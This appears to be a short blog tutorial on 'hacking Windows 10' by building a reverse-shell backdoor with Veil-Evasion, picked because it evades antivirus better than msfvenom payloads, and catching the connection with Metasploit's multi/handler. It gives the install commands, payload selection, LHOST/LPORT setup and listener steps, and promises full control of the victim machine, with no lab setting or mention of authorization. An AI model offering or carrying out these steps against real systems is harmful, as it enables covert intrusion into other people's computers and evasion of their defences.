hacking Windows 10 OS
This article is intended to demonstrate, how to hack Windows machine with help of backdoor .
Backdoor is a program that runs on target system will gives a reverse connection to the attacker to connect to the target machine.
Once attacker get connected to target machine he can do anything he want with that system.
We are going to generate a backdoor using the Veil framework.
You can also generate backdoor using msf-venom but backdoor generated by the msf-venom are more detectable as compare to veil-evasion. So it's better to use veil-evasion.
Veil-Evasion is a tool used to generate payloads. To install the Veil-Framework, you are supposed to configure the latest Python packages into your machine.
The important point to remember is that the installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning. To install it, you first need to download it from Github.
Veil-evasion download link GitHub: git clone https://github.com/Veil-Framework/Veil.git
After downloading perform the following commands.
- cd Veil/./config/setup.sh --force --silent
The installation of veil-evasion might take some time so be patient.
After installing veil evasion follow following steps to Generate Payload
Step - 1: Run veil-evasion by typing ./veil.py
Step-2: Now, select the operation Evasion from the list as following to generate the payload;
Step 3- To list all the available payloads, select the list option followed by payload which will display all the available payloads as following −
Step - 4: Now, select your payload using the use command followed by payload no
step-5 : After selecting payload type show options that will show you all the options to configure with Payload. In which LHOST & LPORT are the compulsory options to set
LHOST: your machine IP address which you can get it by typing ifconfig on your Linux terminal.
LPORT: Port on which you want to listen
And then simply type generate to generate the backdoor
Now Ur payload is created and its path is also given by veil if you want to move payload you can move payload by using mv command followed by payload path and the path where you want to move the payload.
we had successfully created a backdoor now it's time to listen for incoming connections for this we use metasploit framework which comes preinstall in Kali Linux
You can start it by simply typing msfconsole
Do the following steps to listen for incoming connections
1) type use exploit/multi/handler
2) show options
3) set Payload - in this option set the same payload as you set in veil-evasion
4) set LHOST & LPORT as same as you set In veil-payload and hit enter and type exploit
And run the backdoor on target system and boom you got a reverse connection from target system. now you can do anything you with target computer.
That's all for today...
Thanks and stay updated..
And don't forget to follow me on Instagram and GitHub 👇:
https://instagram.com/__pytools__
Comments
Post a Comment